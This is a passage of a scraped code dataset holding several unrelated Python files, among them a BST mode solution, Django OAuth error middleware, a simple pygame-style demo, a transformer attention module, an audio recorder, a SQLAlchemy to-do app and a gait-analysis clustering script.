in bodyNames:\r\n\t\tif name in objects.get():\r\n\t\t\tbodyList = objects.get()[name]\r\n\t\t\tfor body in bodyList:\r\n\t\t\t\tif body.isActor():\r\n\t\t\t\t\tbody.enableCollisions()\r\n\r\ndef setRandomTarget(Engine,EngineModule,objects,jointNames,\r\n\tfreedomXmin, freedomXmax, freedomYmin, freedomYmax, freedomZmin, freedomZmax):\r\n\tfor name in jointNames:\r\n\t\tif name in objects.get():\r\n\t\t\tjointList = objects.get()[name]\r\n\t\t\tfor joint in jointList:\r\n\t\t\t\tif joint.isJoint():\r\n\t\t\t\t\ttarget = joint.getMotorTarget()\r\n\t\t\t\t\ttarget = EngineModule.Quat()\r\n\t\t\t\t\trandomOrientation = EngineModule.Quat().fromAngles(\r\n\t\t\t\t\t\trandom.uniform(freedomXmin,freedomXmax),\r\n\t\t\t\t\t\trandom.uniform(freedomYmin,freedomYmax),\r\n\t\t\t\t\t\trandom.uniform(freedomZmin,freedomZmax)\r\n\t\t\t\t\t\t)\r\n\t\t\t\t\t#randomOrientation = EngineModule.Quat().fromAngles(0,20,0)\r\n\t\t\t\t\tjoint.setMotorTarget(randomOrientation * target)\r\n\r\n\r\ndef findMiddlePos(Engine,EngineModule,objects):\r\n\r\n\tpartsList = objects.get()[\"head\"]\r\n\tpos = partsList[0].getPosition()\r\n\tlowX = pos.x\r\n\thighX = pos.x\r\n\tlowY = pos.y\r\n\thighY = pos.y\r\n\tlowZ = pos.z\r\n\thighZ = pos.z\r\n\tfor part in partsList:\r\n\t\tpos = part.getPosition()\r\n\t\tif pos.x < lowX:\r\n\t\t\tlowX = pos.x\r\n\t\tif pos.x > highX:\r\n\t\t\thighX = pos.x\r\n\r\n\t\tif pos.y < lowY:\r\n\t\t\tlowY = pos.y\r\n\t\tif pos.y > highY:\r\n\t\t\thighY = pos.y\r\n\r\n\t\tif pos.z < lowZ:\r\n\t\t\tlowZ = pos.z\r\n\t\tif pos.z > highZ:\r\n\t\t\thighZ = pos.z\r\n\r\n\tfinalX = highX - ((highX-lowX) * 0.5)\r\n\tfinalY = highY - ((highY-lowY) * 0.5)\r\n\tfinalZ = highZ - ((highZ-lowZ) * 0.5)\r\n\tmiddlePos = EngineModule.Vec3(finalX,finalY,finalZ)\r\n\tmiddlePos = middlePos + EngineModule.Vec3(0,10,0)\r\n\r\n\tif not \"head-debug\" in objects.get():\r\n\t\tb = Engine.createGuiBox()\r\n\t\tb.setColour(0,0,1,0.5)\r\n\t\tb.setSize(EngineModule.Vec3(10,10,10))\r\n\t\tb.setPosition(EngineModule.Vec3(0,200,0))\r\n\t\tobjects.get()[\"head-debug\"] = b\r\n\r\n\tdebug = objects.get()[\"head-debug\"]\r\n\tdebug.setPosition(middlePos)\r\n\r\n\r\ndef applyForceToDebug(Engine,EngineModule,objects,body,force=600000):\r\n\tif \"head-debug\" in objects.get():\r\n\t\tdebug = objects.get()[\"head-debug\"]\r\n\t\tdebugPositioin = debug.getPosition()\r\n\r\n\t\tangleRand = 40\r\n\r\n\t\trelVec = debugPositioin - body.getPosition()\r\n\t\trelVec.normalise()\r\n\t\trelVec = EngineModule.Quat().fromAngles(0,random.uniform(-angleRand,angleRand),0) * relVec\r\n\t\trelVec = relVec * force * random.uniform(0.1,1.0)\r\n\t\trelVec.y = 0\r\n\t\tbody.addForce(relVec)\r\n\r\ndef applyForwardForce(Engine,EngineModule,objects,body,force=60000):\r\n\trelVec = EngineModule.Vec3(-1,0,0)\r\n\trelVec = body.getOrientation() * relVec\r\n\trelVec.normalise()\r\n\trelVec = relVec * force\r\n\tbody.addForce(relVec)\r\n\r\ndef applyDownwardForce(Engine,EngineModule,objects,body,force=60000):\r\n\trelVec = EngineModule.Vec3(0,-1,0)\r\n\trelVec = body.getOrientation() * relVec\r\n\trelVec.normalise()\r\n\trelVec = relVec * force\r\n\tbody.addForce(relVec)\r\n\r\n\r\n\r\n","sub_path":"00_archive/executable_win/engine_scripts/animation_helper.py","file_name":"animation_helper.py","file_ext":"py","file_size_in_byte":9125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"99546353","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/27 14:15\n# @Author : LI Dongdong\n# 
@FileName: 501. Find Mode in Binary Search Tree.py\n''''''\n'''\nProblem summary: in a BST that may contain duplicate values, find the mode(s); there may be more than one\nKey points: in-order traversal of a BST visits values in non-decreasing order; iterative in-order traversal of a BST; use of a dict; how to collect several modes\nSolutions: convert the tree into a dict first, then pick the modes; or collect the modes directly during an in-order traversal\nMethods and analysis: dict-conversion approach; iterative in-order traversal with counting\ntime complexity order: O(N)\nspace complexity order: iterative in-order counting O(1) < dict conversion O(N)\nHow it may be tested\n'''\n'''\nfind the most frequently occurring elements\n\ninput:\n    tree root node; node number range? [0, +inf]; node values repeated? Y; order? BST\noutput:\n    list[mode1], if have more than 1 mode, return [mode1, mode2]\ncorner case:\n    root is None: -> []\n    root is only one -> [root.val]\n\nA. brute force - transfer into a dict and output the mode\n    Method:\n    1. corner case\n    2. preorder traversal of the tree, saving node values and their counts in a dict\n    3. traverse the dict, find the mode(s) and return\n    Time complexity: O(N + N) = O(N) N is number of nodes\n    Space: O(N) used in dict\n\n\n'''\nfrom typing import List\n\n\nclass Solution:\n    def findMode(self, root: 'TreeNode') -> List[int]:\n        if not root:  # corner case\n            return []\n        if not root.left and not root.right:\n            return [root.val]\n\n        def transfer(root, node):  # use a dict to save every node value and its count\n            if not root:\n                return {}\n\n            if root.val not in node:\n                node[root.val] = 1\n            else:\n                node[root.val] += 1\n\n            transfer(root.left, node)\n            transfer(root.right, node)\n\n        def findMode(nodes):  # return the modes in the nodes dict\n            if not nodes:\n                return []\n\n            maxTime = 0\n            res = []\n            for key, value in nodes.items():\n                if value < maxTime:\n                    pass\n                elif value == maxTime:\n                    res.append(key)\n                else:\n                    res = [key]\n                    maxTime = value\n            return res\n\n        node = {}\n        transfer(root, node)\n        res = findMode(node)\n        return res\n\n\n'''\nB. in-order traversal of the tree - count occurrences\n    Method:\n    1. corner case\n    2. in-order traversal of the tree using iteration\n        a. use ans list to save [mode], record maxTimes, preNode, times\n        b. renew the ans list\n    3. return \n    Time: O(N) \n    Space: O(1)\n\nCommon pitfalls:\n    1. Avoid confusing variable names, especially ones that differ only by a trailing 's'; they are easy to mix up, so do not use them\n    2. After editing code, check that the edited code still uses the earlier variable names consistently\n    3. Approach for this problem: record the count first, then compare it with the max and replace the res value\n'''\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\nclass Solution:\n    def findMode(self, root: TreeNode) -> List[int]:\n        if not root:  # corner case\n            return []\n        if not root.left and not root.right:\n            return [root.val]\n\n        ans = []\n        maxTimes = 0\n        pre = TreeNode(float('-inf'))\n        times = 0  # how many times the current node value has appeared\n\n        stack = []\n        while stack or root:\n            while root:\n                stack.append(root)\n                root = root.left\n\n            cur = stack.pop()\n\n            if cur.val == pre.val:  # record times\n                times += 1\n            else:\n                times = 1\n\n            if maxTimes < times:\n                ans = [cur.val]\n                maxTimes = times\n            elif maxTimes == times:\n                ans.append(cur.val)\n            else:\n                pass\n\n            pre = cur\n\n            if cur.right:\n                root = cur.right\n        return ans\n","sub_path":"Binary Search Tree 二叉搜索树/501. Find Mode in Binary Search Tree.py","file_name":"501. 
Find Mode in Binary Search Tree.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"214016333","text":"import unittest\nimport sys\nsys.path.append(\"../src/\")\nfrom maximum_subarray import maximum_diff_brute_force\nfrom maximum_subarray import maximum_diff_divide_and_conquer\nfrom maximum_subarray import maximum_diff_dynamic_programming\nfrom random import randint\n\n\nclass TestMaximumSubarray(unittest.TestCase):\n    def test_maximum_diff_divide_and_conquer(self):\n        \"\"\" Check that the divide-and-conquer result matches the brute-force result. \n        More than one maximum subarray may exist, so only the subarray sum is compared. \n        \"\"\"\n        A = [randint(0, 100) for _ in range(100)]\n        (_, _, max_diff1) = maximum_diff_brute_force(A)\n        (_, _, max_diff2) = maximum_diff_divide_and_conquer(A)\n        self.assertEqual(max_diff1, max_diff2)\n\n    def test_maximum_diff_dynamic_programming(self):\n        \"\"\" Check that the result of Kadane's algorithm matches the brute-force result. \n        More than one maximum subarray may exist, but both functions return the leftmost one, \n        so the results can be compared in full. \n        \"\"\"\n        A = [randint(0, 100) for _ in range(100)]\n        result1 = maximum_diff_brute_force(A)\n        result2 = maximum_diff_dynamic_programming(A)\n        self.assertEqual(result1, result2)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"Ch04/test/maximum_subarray_test.py","file_name":"maximum_subarray_test.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"225092313","text":"\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nimport json\n\nURL_PARAMETERS = ['error','error_description','error_code','error_message','denied']  # common error parameters in social media error URLs\nclass SauthExceptionMiddleware(object):\n\tdef process_request(self,request):\n\t\trg = request.GET.get\n\t\tif any(rg(param) for param in URL_PARAMETERS):\n\t\t\tbackend = request.session['backend']\n\t\t\tstatus = rg(\"error\")\n\t\t\tmessage = ''\n\t\t\tif rg('error_description'):\n\t\t\t\tmessage = rg('error_description')\n\t\t\telif rg('error_message'):\n\t\t\t\tmessage = rg('error_message')\n\t\t\telif rg('denied'):\n\t\t\t\tmessage = \"Key 'oauth_verifier' is not found\"\n\t\t\treason1 = \"User canceled the authentication with %s\" % (backend)\n\t\t\tif rg('error'):\n\t\t\t\tstatus = rg('error')\n\t\t\t\tmessage = rg('error')\n\t\t\telif rg('error_code'):\n\t\t\t\tstatus = rg('error_code')\n\t\t\telif rg('denied'):\n\t\t\t\tstatus = rg('denied')\n\n\t\t\t'''\n\t\t\tThe error is temporarily stored in the user session; if SAUTH_LOGIN_ERROR_URL is set, you can\n\t\t\tread the error in your view function via the session keys [error_status, error_reason, error_desc]\n\t\t\t'''\n\n\t\t\trequest.session['error_status'] = status\n\t\t\trequest.session['error_reason'] = reason1\n\t\t\trequest.session['error_desc'] = message\n\t\t\terror_url = getattr(settings, 'SAUTH_LOGIN_ERROR_URL', '')\n\t\t\tif not error_url:\n\t\t\t\treturn HttpResponse(json.dumps({\"error\":status,'message':message,'reason':reason1}))\n\t\t\telse:\n\t\t\t\treturn HttpResponseRedirect(reverse(error_url))\n","sub_path":"sauth/middleware/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"633252513","text":"#""Joe's GUI program in 
Python\"\"\r\n\r\n#import from livewires graphic package\r\nfrom livewires import games, color\r\n\r\n\r\n#Making the pizzas bounce, making a derived class, and overriding the update method\r\nclass Pizza(games.Sprite): #Base class of Sprite\r\n \"\"\"A Bouncing Pizza.\"\"\"\r\n \r\n def update(self):\r\n \"\"\"Reverse a velocity component if edge of screen reached.\"\"\"\r\n if self.right > games.screen.width or self.left < 0:\r\n self.dx = -self.dx\r\n \r\n if self.bottom > games.screen.height or self.top < 0:\r\n self.dy = -self.dy\r\n\r\n\r\n#Now adding on the Pan class, so that I can use mouse-input to update Pan position\r\nclass Pan(games.Sprite):\r\n \"\"\"A Pan controlled by the mouse\"\"\"\r\n \r\n def update(self):\r\n \"\"\"Move the Mouse coordiantes\"\"\"\r\n self.x = games.mouse.x\r\n self.y = games.mouse.y\r\n \r\n \r\n# MAIN:\r\ndef main():\r\n # create window\r\n games.init(screen_width = 640, screen_height = 480, fps =50)\r\n\r\n #Load background\r\n #still has problem if we give absolute path, i.e.\"C:\\lkjlfs\\dfdsfs\"\r\n wall_image = games.load_image(\"CIMG2622.JPG\", transparent = False)\r\n games.screen.background = wall_image\r\n\r\n # Add on additional sprite, animation object\r\n #~ cxtree_image = games.load_image(\"cxmastree.bmp\")\r\n #~ xtree = games.Sprite(image = cxtree_image, x = 320, y=240)\r\n #~ games.screen.add(xtree)\r\n\r\n # Add on 3 pizzas for 3 girls\r\n p_image = games.load_image(\"pizza.bmp\")\r\n #~ pizza1 = games.Sprite(image = p_image, x = 470, y=280, dx =1, dy =-1)\r\n #~ pizza2 = games.Sprite(image = p_image, x = 240, y=280, dx = -1, dy =-1)\r\n #~ pizza3 = games.Sprite(image = p_image, x = 320, y=280, dx =-1, dy =1)\r\n \r\n #Now calling derived class Pizza to make them bounce via over-ride update method.\r\n pizza1 = Pizza(image = p_image, x = 470, y=280, dx =1, dy =-1)\r\n pizza2 = Pizza(image = p_image, x = 240, y=280, dx = -1, dy =-1)\r\n pizza3 = Pizza(image = p_image, x = 320, y=280, dx =-1, dy =1)\r\n games.screen.add(pizza1)\r\n games.screen.add(pizza2)\r\n games.screen.add(pizza3)\r\n\r\n # Display the girls' names as Text and Color demo\r\n amita = games.Text(value = \"Amita\",\r\n size = 20,\r\n color = color.blue,\r\n x= 240,\r\n y= 310)\r\n \r\n \r\n anika = games.Text(value = \"Anika\",\r\n size = 20,\r\n color = color.pink,\r\n x= 470,\r\n y= 310)\r\n \r\n\r\n alina = games.Text(value = \"Alina\",\r\n size = 20,\r\n color = color.yellow,\r\n x= 320,\r\n y= 310)\r\n \r\n \r\n games.screen.add(amita)\r\n games.screen.add(anika)\r\n games.screen.add(alina)\r\n\r\n #Display \"Dinner Time\" as Message demo\r\n eatMessage = games.Message(value = \"Dinner Time!!!\",\r\n size = 40,\r\n color = color.red,\r\n x = games.screen.width/2,\r\n y = games.screen.height/2,\r\n lifetime = 250,\r\n after_death = games.screen.mainloop)\r\n\r\n games.screen.add(eatMessage)\r\n\r\n #Create Pan sprite and add to screen.\r\n pan_image = games.load_image(\"pan.bmp\")\r\n pan = Pan(image = pan_image, \r\n x = games.mouse.x,\r\n y = games.mouse.y)\r\n \r\n games.screen.add(pan)\r\n \r\n #Setting mouse pinter not visible\r\n games.mouse.is_visible = False\r\n \r\n #Grab all graphic events\r\n games.screen.event_grab = True\r\n \r\n #Load music file playing as background\r\n games.music.load(\"theme.mid\")\r\n games.music.play()\r\n \r\n #Load a sound file for use in case of collision, etc...\r\n missile_sound = games.load_sound(\"missile.wav\")\r\n loop = 9999\r\n #missile_sound.play(loop) #continuous\r\n \r\n \r\n #Display window on screen\r\n 
games.screen.mainloop()\r\n\r\n\r\n#Launch Main()\r\nmain()\r\n","sub_path":"Python/JoePythonGame/JoeS_Python_GUI_Rev1.py","file_name":"JoeS_Python_GUI_Rev1.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"27003053","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n__author__ = \"Yu-Hsiang Huang\"\n\nclass ScaledDotProductAttention(nn.Module):\n    ''' Scaled Dot-Product Attention '''\n\n    def __init__(self, temperature, attn_dropout=0.1):\n        super().__init__()\n        self.temperature = temperature  # scaling denominator\n        self.dropout = nn.Dropout(attn_dropout)\n        self.softmax = nn.Softmax(dim=2)\n\n    def forward(self, q, k, v, mask=None):\n        # q shape: (heads*batch) x len x dk\n        # k shape: (heads*batch) x len x dk\n        # v shape: (heads*batch) x len x dv\n        # mask shape: heads*batch_size, len, len\n\n        # q times k transposed; attn shape: heads*batch, len, len\n        # so each batch slot holds a len*len square matrix:\n        # each row holds the query result for that position, i.e. the attention\n        # coefficients between that word and every word,\n        # so, read row by row, these are the prepared coefficients for the values\n        attn = torch.bmm(q, k.transpose(1, 2))\n        attn = attn / self.temperature\n\n        if mask is not None:\n            # mask shape: heads * batch_size, len, len\n            # The tail of a sentence (the large len positions) may be padding,\n            # so those positions should receive an attention score of -inf. In detail:\n            # if the sentence length is 4 and the last position is padding, the mask is\n            # T T T F\n            # T T T F\n            # T T T F\n            # T T T F\n            # which says position 4 is padding; masked_fill below sets every\n            # F position to -inf, and after the softmax along dim=2 the F\n            # positions are assigned a weight of 0\n            # fill the positions that should be -inf\n            attn = attn.masked_fill(mask, -np.inf)\n\n        # attn: heads*batch_size, len, len; softmax is taken over dim=2\n        attn = self.softmax(attn)\n        attn = self.dropout(attn)  # some positions are randomly zeroed\n\n        # attn shape: batch*heads, len_q, len_q\n        # v/output shape: heads*batch, len_v, dv\n        # effectively s, s, dv; each row of the result masks out the padding value positions,\n        # but the padding rows themselves still contain data, so the last rows of the\n        # output may be invalid and have to be hard-truncated afterwards.\n        output = torch.bmm(attn, v)\n        return output, attn\n\n","sub_path":"transFormerSummarization/transformer/Modules.py","file_name":"Modules.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"437961454","text":"class frase_letra():\n    def __init__(self):\n        self.lista = ''\n        self.letra = ''\n\n    def encontrar(self):\n        self.lista = input(\"enter a phrase\\n\")\n        self.letra = input(\"enter a letter\\n\")\n        n = 0\n        for i in self.lista:\n            if i == self.letra:\n                n = n + 1\n        print(\"the number of times that letter is repeated is\", str(n))\n\n\nlet = frase_letra()\n\nlet.encontrar()\n","sub_path":"Tp1/ej7.py","file_name":"ej7.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"208225132","text":"import pyaudio\nimport wave\n#from multiprocessing import Process, Queue\nimport time\nfrom threading import Thread\nimport Queue\nCHUNK = 1024\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\n#this line was edited by slobacartoonac@hotmail.com\nWAVE_OUTPUT_FILENAME = \"atmp.wav\"\n#\n\n#this line too\ndef record(q):\n    p = pyaudio.PyAudio()\n    q.put(1)\n    time.sleep(1)\n    stream = p.open(format=FORMAT,\n                    channels=CHANNELS,\n                    rate=RATE,\n                    input=True,\n                    frames_per_buffer=CHUNK)\n\n    print(\"* recording\")\n\n    frames = []\n    pi = 1\n\n    while 1:\n        data = stream.read(CHUNK)\n        frames.append(data)\n        try:\n            pi = q.get_nowait()\n            if pi == -1:\n                break\n        except:\n            pass\n\n    print(\"* done recording\")\n\n    stream.stop_stream()\n    stream.close()\n    p.terminate()\n\n    wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n    
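# the wave writer needs the channel count, sample width and frame rate set\n    # before writeframes() is called, otherwise the wave module raises wave.Error\n    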
wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n return WAVE_OUTPUT_FILENAME\n","sub_path":"recorder/the_recorder/recorder_sound.py","file_name":"recorder_sound.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"390376920","text":"import calendar\nfrom time import strptime\n\nfrom sqlalchemy import create_engine, func\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom datetime import datetime, timedelta, date\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\n\nBase = declarative_base()\n\n\nclass Table(Base):\n __tablename__ = 'task'\n id = Column(Integer, primary_key=True)\n task = Column(String)\n deadline = Column(Date, default=datetime.today())\n\n def __repr__(self):\n return self.task\n\n\nBase.metadata.create_all(engine)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nmenu = \"\"\"1) Today's tasks\n2) Week's tasks\n3) All tasks\n4) Missed tasks\n5) Add task\n6) Delete task\n0) Exit\"\"\"\n\nprint(menu)\nchoice = int(input())\n\n\ndef day_task(day):\n rows = session.query(Table).filter(func.DATE(Table.deadline == day))\n print(day.strftime(\"%A\"), day.day, day.strftime(\"%B\") + \":\")\n if rows.count() >0:\n for i, row in zip(range(rows.count()), rows):\n print(f\"{i+1}.{row.task}\")\n else:\n print(\"Nothing to do!\")\n\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\n\nwhile choice != 0:\n print(\"\")\n #today's tasks\n if choice == 1:\n day_task(datetime.today().date())\n\n #week's tasks\n elif choice == 2:\n for day in daterange(datetime.today(), datetime.today() + timedelta(days=7)):\n day_task(day)\n print(\"\")\n\n #all tasks\n elif choice == 3:\n rows = session.query(Table).order_by(Table.deadline)\n if rows.count() >0:\n for row in rows:\n print(f\"{row.task}. {str(row.deadline.day)} {calendar.month_abbr[row.deadline.month]}\")\n else:\n print(\"Nothing to do!\")\n\n #missed tasks\n elif choice == 4:\n rows = session.query(Table).filter(Table.deadline < datetime.today().date()).order_by(Table.deadline)\n if rows.count() > 0:\n print(\"Missed tasks:\")\n for row in rows:\n print(f\"{row.task}. {str(row.deadline.day)} {calendar.month_abbr[row.deadline.month]}\")\n else:\n print(\"Nothing is missed!\")\n\n #add task\n elif choice == 5:\n task = input(\"Enter task\\n\")\n deadline = input(\"Enter deadline\\n\")\n new_row = Table(task=task)\n y, m, d = deadline.split('-')\n deadline = datetime(int(y), int(m), int(d))\n new_row.deadline = deadline\n session.add(new_row)\n session.commit()\n print(\"The task has been added!\")\n\n #delete task\n elif choice == 6:\n print(\"Choose the number of the task you want to delete\")\n rows = session.query(Table).order_by(Table.deadline)\n if rows.count() > 0:\n for i, row in zip(range(rows.count()),rows):\n print(f\"{i+1}. {row.task}. 
{str(row.deadline.day)} {calendar.month_abbr[row.deadline.month]}\")\n task_number = int(input())\n session.delete(rows[task_number-1])\n session.commit()\n print(\"The task has been deleted!\")\n print(\"\")\n print(menu)\n choice = int(input())\n\nif choice == 0:\n print(\"Bye!\")\n","sub_path":"To-Do List/task/todolist/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"437411281","text":"import math\nimport matplotlib.pyplot as plt\nimport numpy as np\nprint(\"este es un programa de un sistema de un grado de libertad de dos columnas y una viga\")\ncarg=input(\"agrega la carga que estara sobre la estructura(Toneladas sobre metro) \")\nx0=input(\"agrega el dezplazamiento que tomara el cuerpo (en cm) \")\nv0=input(\"agrega la velocidad inicial que tomara el cuerpo (en cm/s) \")\nh=input(\"agrega la altura del cuerpo (en m) \")\nl=input(\"agrega lo largo que tendra el cuerpo (en m) \")\namort=input(\"agrega el porcentaje de amoriguamiento del material en decimales \")\nx1=input(\"agrega el largo de la viga (en cm) \")\ny1=input(\"agrega el ancho de la viga (en cm) \")\nfc=input(\"agrega la resistencia al concreto del cuerpo(kg/cm2) \")\nx=np.linspace(0,6,100)\ne=2.718281828\nm=carg*l/9.81 #masa\ni=((l*h)**3)/.5 #inercia\nec=10000*((fc)**.5) #modulo de elasticidad\nk=24*ec*i/((h*100)**3) #rigidez de la columna\nw=(k/m)**.5\nb=amort*w\nwd=w*((1-amort**2)**(.5))\nep=e**(-b*x)\nsig11=x0\nsig121=[wd*xx for xx in x]\nsig12=[math.cos((s121*3.1416)/180) for s121 in sig121]\nsig1=[sig11*s for s in sig12]\nsig2=[((v0+(b*x0))/(wd*xx))*math.sin((wd*xx*3.1416)/180) for xx in x]\nsig=[sig1[i]+sig2[i] for i in range(len(sig1))]\ny=ep*sig\nplt.plot(x,y,linewidth=3,color='blue')\nplt.legend()\nplt.title('$grafica del movimiento del cuerpo conforme al tiempo$')\nplt.xlabel('tiempo')\nplt.ylabel('velocidad')\nplt.grid(True)\nplt.savefig('graficaproyc.png')\nplt.show()\n","sub_path":"proyectofinal.py","file_name":"proyectofinal.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"256142944","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.cluster import KMeans\nfrom scipy import optimize\nfrom numpy import*\n\n\nR_N_CLUSTERS = 4\nL_N_CLUSTERS = 4\nproject_path = \"/home/yagi/CLionProjects/homographyStepEstimation/projects\"\nproject_name = \"optitrack\"\nvideo_name = \"021501\"\ntxt_path = project_path + \"/\" + project_name + \"/results/\" + video_name + \"/\"\n\nr_result_path = txt_path + 'Rresult.txt'\nl_result_path = txt_path + 'Lresult.txt'\n\ndef loadData(path):\n ptList = []\n frameList = []\n with open(path) as f:\n for s_line in f:\n words = s_line.split(\" \")\n point = []\n point.append(int(words[0]))\n point.append(int(words[1]))\n point.append(int(words[2]))\n ptList.append(point)\n frameList.append(int(words[2]))\n return np.array(ptList)\n\ndef kmeans(features, N_CLUSTERS):\n # クラスタリングする\n cls = KMeans(n_clusters=N_CLUSTERS)\n pred = cls.fit_predict(features)\n\n # 各要素をラベルごとに色付けして表示する\n for i in range(N_CLUSTERS):\n labels = features[pred == i]\n plt.scatter(labels[:, 0], labels[:, 1])\n\n # クラスタのセントロイド (重心) を描く\n centers = cls.cluster_centers_\n\n # 重心をソート\n centers.sort(axis=0)\n plt.scatter(centers[:, 0], centers[:, 1], s=100,\n facecolors='none', 
edgecolors='black')\n plt.show()\n\n return centers\n\n#Least squares method with scipy.optimize\ndef fit_func(parameter,x,y):\n a = parameter[0]\n b = parameter[1]\n residual = y-(a*x+b)\n return residual\n\ndef linearApproximation(data):\n xdata = data[:, 0]\n ydata = data[:, 1]\n print(xdata)\n print(ydata)\n parameter0 = [0., 0.]\n result = optimize.leastsq(fit_func, parameter0, args=(xdata, ydata))\n a_fit = result[0][0]\n b_fit = result[0][1]\n\n print(a_fit, b_fit)\n return a_fit, b_fit\n\ndef getStrideLength(data):\n steps = data[:,:2]\n slList = []\n for i in range(steps.shape[0] - 1):\n a = np.array([steps[i,0],steps[i,1]])\n b = np.array([steps[i+1,0],steps[i+1,1]])\n u = b - a\n sl = np.linalg.norm(u)\n slList.append(sl)\n return slList\n\ndef getStrideWidth(steps, a, b):\n pt1 = (0, b)\n pt2 = (500, 500*a+b)\n swList = []\n for i in range(steps.shape[0]):\n sw = distance_l(pt1, pt2, (steps[i,0],steps[i,1]))\n swList.append(sw)\n return swList\n\ndef distance_l(a,b,c):\n u = np.array([b[0]-a[0],b[1]-a[1]])\n v = np.array([c[0]-a[0],c[1]-a[1]])\n L = abs(cross(u,v)/linalg.norm(u))\n return L\n\ndef output_result(steps, sl, sw, result_path):\n with open(result_path, mode='w') as f:\n\n f.write(\"step positions: \\n\")\n for i in range(steps.shape[0]):\n f.write(str(steps[i,0]) + \" \" + str((steps[i,1])))\n f.write(\"\\n\")\n\n f.write(\"step timing: \\n\")\n for i in range(steps.shape[0]):\n f.write(str(steps[i, 2]))\n f.write(\"\\n\")\n\n f.write(\"stride length: \\n\")\n for a in sl:\n f.write(str(a))\n f.write(\"\\n\")\n\n f.write(\"stride width: \\n\")\n for a in sw:\n f.write(str(a))\n f.write(\"\\n\")\n\ndef estimateParams(r, l):\n rsl = getStrideLength(r)\n lsl = getStrideLength(l)\n ra, rb = linearApproximation(r)\n la, lb = linearApproximation(l)\n rsw = getStrideWidth(r,la,lb)\n lsw = getStrideWidth(l,ra,rb)\n output_result(r, rsl, rsw, r_result_path)\n output_result(l, lsl, lsw, l_result_path)\n\n\nif __name__ == '__main__':\n Rsteps = loadData(txt_path + \"RstepPoints.csv\")\n Lsteps = loadData(txt_path + \"LstepPoints.csv\")\n Rcenters = kmeans(Rsteps, R_N_CLUSTERS)\n Lcenters = kmeans(Lsteps, L_N_CLUSTERS)\n estimateParams(Rcenters, Lcenters)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"553112347","text":"from channels.auth import AuthMiddlewareStack\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nimport chat.routing\n\n#'application' is very similar to 'urlpatterns'\napplication = ProtocolTypeRouter({\n #Now we wrap our routers inside the AuthMiddlewareStack so as to utilise the built-in authentication provided by django. 
\n 'websocket': AuthMiddlewareStack(\n URLRouter(\n chat.routing.websocket_urlpatterns\n )\n )\n\n})","sub_path":"core/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"190930274","text":"\"\"\"\nRun Multitask Network Inference with TFA-AMuSR.\n\"\"\"\nimport os\n\n# Shadow built-in zip with itertools.izip if this is python2 (This puts out a memory dumpster fire)\ntry:\n from itertools import izip as zip\nexcept ImportError:\n pass\n\nimport pandas as pd\nimport numpy as np\nfrom inferelator_ng import utils\nfrom inferelator_ng import single_cell_puppeteer_workflow\nfrom inferelator_ng import single_cell_workflow\nfrom inferelator_ng import default\nfrom inferelator_ng import amusr_regression\nfrom inferelator_ng import results_processor\n\n\nclass ResultsProcessorMultiTask(results_processor.ResultsProcessor):\n \"\"\"\n This results processor should handle the results of the MultiTask inferelator\n\n It will output the results for each task, as well as rank-combining to construct a network from all tasks\n \"\"\"\n\n write_task_files = True\n tasks_names = []\n\n def __init__(self, betas, rescaled_betas, threshold=0.5, filter_method='overlap', tasks_names=None):\n \"\"\"\n :param betas: list(pd.DataFrame[G x K])\n :param rescaled_betas: list(pd.DataFrame[G x K])\n :param threshold: float\n :param filter_method: str\n How to handle gold standard filtering ('overlap' filters to beta, 'keep_all_gold_standard' doesn't filter)\n :param tasks_names: list(str)\n The names for each task\n \"\"\"\n self.betas = betas\n self.rescaled_betas = rescaled_betas\n 